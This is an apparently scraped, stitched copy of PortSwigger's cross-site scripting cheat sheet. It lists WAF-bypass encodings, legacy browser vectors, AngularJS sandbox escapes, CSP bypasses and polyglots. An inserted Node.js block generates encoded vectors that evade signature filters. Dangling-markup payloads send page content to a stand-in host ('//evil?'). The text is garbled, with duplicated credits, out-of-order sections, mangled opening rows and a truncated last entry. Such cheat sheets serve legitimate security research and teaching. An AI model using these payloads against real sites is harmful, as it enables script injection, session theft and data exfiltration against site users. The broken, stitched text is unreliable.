This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C, gadhiyasavan, p4fg, diofeher.

You can contribute to this cheat sheet by creating a new issue, or by updating the JSON and creating a pull request.


window[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (self)

self[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (this)

this[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (top)

top[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (parent)

parent[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (frames)

frames[alsource+ertsource](XSSsource)

XSS into a JavaScript string RegExp sourceproperty (globalThis)

globalThis[alsource+ertsource](XSSsource)

XSS into a JavaScript string HieroglyphyJSFuck(window)

window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(self)

self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(this)

this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(top)

top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(parent)

parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(frames)

frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(globalThis)

globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
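The rows above differ only in how the string naming the property is spelled; the global alias and the bracket lookup do the rest. The block below is an added example for Node.js (mine, not part of the PortSwigger cheat sheet): it generates each spelling for any identifier, evaluates them to show they all resolve to one property name, assembles the full vector against the `globalThis` or `this` alias with a constructed `alert`/`document` stub, and runs a literal-token signature over the results to show why a WAF rule of that kind misses every one of them. The JSFuck alphabet is deliberately limited to what `true`, `false`, `undefined`, `NaN` and `[object Object]` provide; that is an assumption of this example, not a limit of the technique.

```javascript
// Added example, not from the PortSwigger cheat sheet: every row in the section
// above is an alternative spelling of
//   window['alert'](window['document']['domain'])
// These helpers generate those spellings for any identifier, show that they all
// resolve to the same property name, and show why a literal-token WAF rule does
// not see them. Runs under Node.js; no network needed.

if (typeof globalThis.atob !== 'function') {          // Node < 16 has no global atob
  globalThis.atob = (b) => Buffer.from(b, 'base64').toString('latin1');
}

const codeHex = (c, width) => c.charCodeAt(0).toString(16).padStart(width, '0');

// Only plain identifiers: the octal encoder relies on 3-digit escapes (code >= 64)
// and the RegExp encoder on the text containing no regex metacharacters.
function ident(s) {
  if (!/^[A-Za-z_$][A-Za-z0-9_$]*$/.test(s)) throw new Error(`not an identifier: ${s}`);
  return s;
}

// One encoder per cheat-sheet row; each returns a JS expression equal to `s`.
const encoders = {
  concat:  (s) => `'${s.slice(0, 3)}'+'${s.slice(3)}'`,                                   // 'ale'+'rt'
  comment: (s) => `/*foo*/'${s}'/*bar*/`,                                                  // /*foo*/'alert'/*bar*/
  hex:     (s) => `'${[...s].map((c) => '\\x' + codeHex(c, 2)).join('')}'`,                // '\x61\x6c\x65\x72\x74'
  octal:   (s) => `'${[...s].map((c) => '\\' + c.charCodeAt(0).toString(8)).join('')}'`,   // '\141\154\145\162\164'
  unicode: (s) => `'${[...s].map((c) => '\\u' + codeHex(c, 4)).join('')}'`,                // '\u0061\u006c...'
  regexp:  (s) => `/${s.slice(0, 2)}/.source+/${s.slice(2)}/.source`,                      // /al/.source+/ert/.source
  base64:  (s) => `atob('${Buffer.from(s, 'utf8').toString('base64')}')`,                   // atob('YWxlcnQ=')
  jsfuck:  (s) => jsfuck(s),
};

function encode(kind, s) {
  return encoders[kind](ident(s));
}

// Hieroglyphy/JSFuck style: strings that bare punctuation yields, indexed by
// numbers built from +[] (0) and +!![] (1). This small alphabet has no 'm', so
// 'document' cannot be spelled with it; jsfuck() throws rather than guess.
const jsfuckSources = [
  ['(!![]+[])', 'true'],
  ['(![]+[])', 'false'],
  ['([][[]]+[])', 'undefined'],
  ['(+{}+[])', 'NaN'],
  ['([]+{})', '[object Object]'],
];
const jsfuckNumber = (n) => (n === 0 ? '+[]' : '+!![]'.repeat(n)); // +!![]+!![] === 2

function jsfuck(s) {
  return [...s].map((c) => {
    for (const [expr, text] of jsfuckSources) {
      const i = text.indexOf(c);
      if (i !== -1) return `${expr}[${jsfuckNumber(i)}]`;
    }
    throw new Error(`no bare-punctuation source for ${JSON.stringify(c)}`);
  }).join('+');
}

// Evaluate an encoded expression and return the property name it denotes.
function resolve(expr) {
  return Function(`return (${expr})`)();
}

// Full cheat-sheet vector for one encoding and one global alias. The JSFuck row
// alerts a single letter, as on the cheat sheet, because of the alphabet limit.
function vector(kind, global = 'window') {
  const arg = kind === 'jsfuck'
    ? encode(kind, 'a')
    : `${global}[${encode(kind, 'document')}][${encode(kind, 'domain')}]`;
  return `${global}[${encode(kind, 'alert')}](${arg})`;
}

// Execute a vector against stubbed alert/document (constructed for this
// example) and return what alert received. Only the `globalThis` and `this`
// aliases exist in Node; window, self, top, parent and frames are browser-only.
function runVector(src) {
  let received;
  globalThis.alert = (x) => { received = x; };
  globalThis.document = { domain: 'example.test' };
  Function(src)();
  return received;
}

// A typical signature rule blocking the literal tokens. Every encoding above
// slips past it, which is why context-aware output encoding, not a blocklist,
// is the real fix for the injection.
const naiveSignature = /alert\s*\(|document\.domain/i;
const blockedByNaiveSignature = (src) => naiveSignature.test(src);
```

`vector('hex')` returns the cheat-sheet row verbatim, and `runVector(vector('hex', 'globalThis'))` executes it under Node against the stub. The last two lines are the practitioner's point: a rule keyed on the literal `alert(` or `document.domain` catches `alert(document.domain)` and nothing else in this section, so the durable fix is escaping at the injection context, with a WAF as defence in depth only.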

Impossible labs

Title: Basic context, WAF blocks <[a-zA-Z]
Description: This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour, and it's only known to be exploitable in old IE with <%tag.
Length limit: N/A
Closest vector: N/A

Title: Script-based injection, but quotes, forward slash and backslash are escaped
Description: We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/back slashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script-based context and the second in HTML.
Length limit: N/A
Closest vector: N/A

Title: innerHTML context, but no equals allowed
Description: You have a site that processes the query string and URL-decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work, and we can't use = to create an event.
Length limit: N/A
Closest vector: N/A

Title: Basic context, length limit
Description: This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q/oncut=alert``, but can you beat it?
Length limit: 15
Closest vector: <q/oncut=alert``

Title: Attribute context, length limit
Description: The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, "oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?
Length limit: 14
Closest vector: "oncut=alert`` (with a trailing space)

Title: Basic context, length limit, arbitrary code
Description: It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.
Length limit: 19
Closest vector: <q/oncut=eval(name)

Title: Attribute context, length limit, arbitrary code
Description: Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute-based injection with arbitrary JavaScript.
Length limit: 17
Closest vector: see the lab link

Title: Injection occurs inside a frameset but before the body
Description: We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.
Length limit: N/A
Closest vector: N/A

Title: Injection occurs inside a single-quoted string; only the characters a-zA-Z0-9+` are allowed
Description: The injection occurs within a single-quoted string, and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.
Length limit: N/A
Closest vector: N/A

Classic vectors (XSS crypt)

Image src with JavaScript protocol

<img src="javascript:alert(1)">

Body background with JavaScript protocol

<body background="javascript:alert(1)">

Iframe data URLs no longer work, as modern browsers give them a null origin

<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

VBScript protocol used to work in IE

<a href="vbscript:MsgBox+1">XSS</a>
<a href="#" onclick="vbs:Msgbox+1">XSS</a>
<a href="#" onclick="VBS:Msgbox+1">XSS</a>
<a href="#" onclick="vbscript:Msgbox+1">XSS</a>
<a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a>
<a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>

JScript compact was a minimal version of JS that wasn't widely used in IE

<a href="#" onclick="jscript.compact:alert(1)">test</a>
<a href="#" onclick="JSCRIPT.COMPACT:alert(1)">test</a>

JScript.Encode allows encoded JavaScript

<a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
<a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>

VBScript.Encode allows encoded VBScript

<iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
<iframe language="VBScript.Encode" onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">

JavaScript entities used to work in Netscape Navigator

<a title="&{alert(1)}">XSS</a>

JavaScript stylesheets used to be supported by Netscape Navigator

<link href="xss.js" rel="stylesheet" type="text/javascript">

Button used to consume markup

<form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume markup

<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

XBL, Firefox only <= 2

<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="\-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">
<div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">

XBL also worked in FF3.5 using data URLs

<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)">

CSS expressions, <= IE7

<div style="xss:expression(alert(1))">
<div style="xss:expression(1)-alert(1)">
<div style="xss:expressio\6e(alert(1))">
<div style="xss:expressio\006e(alert(1))">
<div style="xss:expressio\00006e(alert(1))">
<div style="xss:expressio\6e(alert(1))">
<div style="xss:expressio&#x5c;6e(alert(1))">

In quirks mode IE allowed you to use = instead of :

<div style="xss=expression(alert(1))">
<div style="color&#x3d;red">test</div>

Behaviors for older modes of IE

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions

<script> function window.onload() { alert(1) } </script>
<script> function window::onload() { alert(1) } </script>
<script> function window.location() {} </script>
<body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML() {} </script> </body>
<body> <script> function document.body.innerHTML() { x = "<img src=1 onerror=alert(1)>" } </script> </body>

GreyMagic HTML+time exploit (no longer works, even in 5 docmode)

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>

Firefox allows NULLs after &

<a href="javascript:&#x6a;avascript:alert(1)">Firefox</a>

Firefox allows NULLs inside named entities

<a href="javascript:&colon;alert(1)">Firefox</a>

Firefox allows NULL characters inside opening comments

<!-- ><img title="--><iframe/onload=alert(1)>"> -->
<!-- ><img title="--><iframe/onload=alert(1)>"> -->

Safari used to allow any tag to have an onload event inside SVG

<svg><xss onload=alert(1)>

Isindex using src attribute

<isindex type=image src=//evil?

Isindex using submit

<isindex type=submit style=width:100%;height:100%; value=XSS formaction=//evil?

Isindex and formaction

<isindex type=submit formaction=javascript:alert(1)>

Isindex and action

<isindex type=submit action=javascript:alert(1)>

Credits

Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.

You can contribute to this cheat sheet by creating a new issue, or by updating the JSON and creating a pull request.


You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request


[].join;$eval('x=alert(1)')

1.3.19, Gareth Heyes (PortSwigger), length 102:
{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}

1.3.20, Gareth Heyes (PortSwigger), length 65:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9, Gareth Heyes (PortSwigger), length 74:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

1.5.0 - 1.5.8, Ian Hickey & Gareth Heyes (PortSwigger), length 79:
{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}

1.5.9 - 1.5.11, Jan Horn (Google), length 517:
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void 0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}

>= 1.6.0, Mario Heiderich (Cure53), length 41:
{{constructor.constructor('alert(1)')()}}

>= 1.6.0 (shorter), Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys), length 33:
{{$on.constructor('alert(1)')()}}

DOM based AngularJS sandbox escapes (using orderBy or no $eval)

Version, author, length; vector on the following line

1.0.1 - 1.1.5, Mario Heiderich (Cure53), length 37:
constructor.constructor('alert(1)')()

1.2.0 - 1.2.18, Jan Horn (Google), length 118:
a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()

1.2.19 - 1.2.23, Mathias Karlsson (Detectify), length 119:
toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)

1.2.24 - 1.2.26, Gareth Heyes (PortSwigger), length 317:
{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g=[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d=[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});[['__proto__']]['y'].value('alert(1)')()

1.2.27 - 1.2.29, 1.3.0 - 1.3.20, Gareth Heyes (PortSwigger), length 20:
'\\'}})));alert(1)//

1.4.0 - 1.4.5, Gareth Heyes (PortSwigger), length 75:
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';

>= 1.6.0, Mario Heiderich (Cure53), length 37:
constructor.constructor('alert(1)')()

1.4.4 (without strings), Gareth Heyes (PortSwigger), length 134:
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

AngularJS CSP bypasses

Version, author, length; vector on the following line

All versions (Chrome), Gareth Heyes (PortSwigger), length 81:
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">

All versions (Chrome, shorter), Gareth Heyes (PortSwigger), length 56:
<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>

All versions (all browsers, shorter), Gareth Heyes (PortSwigger), length 91:
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

1.2.0 - 1.5.0, Eduardo Vela (Google), length 190:
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>

All versions (Chrome, shorter via oncut), Savan Gadhiya (NotSoSecure), length 49:
<input ng-cut=$event.path|orderBy:'(y=alert)(1)'>

Scriptless attacks

Dangling markup

Background attribute
<body background="//evil?
<table background="//evil?
<table><thead background="//evil?
<table><tbody background="//evil?
<table><tfoot background="//evil?
<table><td background="//evil?
<table><th background="//evil?

Link href stylesheet
<link rel=stylesheet href="//evil?

Link href icon
<link rel=icon href="//evil?

Meta refresh
<meta http-equiv="refresh" content="0; http://evil?

Img to pass markup through src attribute
<img src="//evil?
<image src="//evil?

Video using track element
<video><track default src="//evil?

Video using source element and src attribute
<video><source src="//evil?

Audio using source element and src attribute
<audio><source src="//evil?

Input src
<input type=image src="//evil?

Button using formaction
<form><button style="width:100%;height:100%;" type=submit formaction="//evil?

Input using formaction
<form><input type=submit value="XSS" style="width:100%;height:100%;" type=submit formaction="//evil?

Form using action
<button form=x style="width:100%;height:100%;"><form id=x action="//evil?

Object data
<object data="//evil?

Iframe src
<iframe src="//evil?

Embed src
<embed src="//evil?

Embed src
<embed src "//evil?

Use textarea to consume markup and post to external site
<form><button formaction=//evil>XSS</button><textarea name=x>

Pass markup data through window.name using form target
<button form=x>XSS</button><form id=x action=//evil target="

Pass markup data through window.name using base target
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="

Pass markup data through window.name using formtarget
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="

Using base href to pass data
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/

Using embed window name to pass data from the page
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using iframe window name to pass data from the page
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using object window name to pass data from the page
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using frame window name to pass data from the page
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Overwrite type attribute with image in hidden inputs
<input type=hidden type=image src="//evil?

Polyglots

Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Polyglot payload 3
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>

WAF bypass global objects

XSS into a JavaScript string, string concatenation (window)
window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (self)
self['ale'+'rt'](self['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (this)
this['ale'+'rt'](this['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (top)
top['ale'+'rt'](top['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (parent)
parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (frames)
frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (globalThis)
globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, comment syntax (window)
window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (self)
self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (this)
this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (top)
top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (parent)
parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (frames)
frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (globalThis)
globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, hex escape sequence (window)
window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (self)
self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (this)
this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (top)
top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (parent)
parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (frames)
frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (globalThis)
globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence and base64 encoded string (window)
window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (self)
self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (this)
this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (top)
top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent)
parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames)
frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis)
globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, octal escape sequence (window)
window['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (self)
self['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (this)
this['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (top)
top['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (parent)
parent['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (frames)
frames['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (globalThis)
globalThis['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, unicode escape (window)
window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (self)
self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (this)
this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (top)
top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (parent)
parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (frames)
frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (globalThis)
globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, RegExp source property (window)
window[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (self)
self[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (this)
this[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (top)
top[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (parent)
parent[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (frames)
frames[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (globalThis)
globalThis[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, Hieroglyphy/JSFuck (window)
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (self)
self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (this)
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (top)
top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (parent)
parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (frames)
frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis)
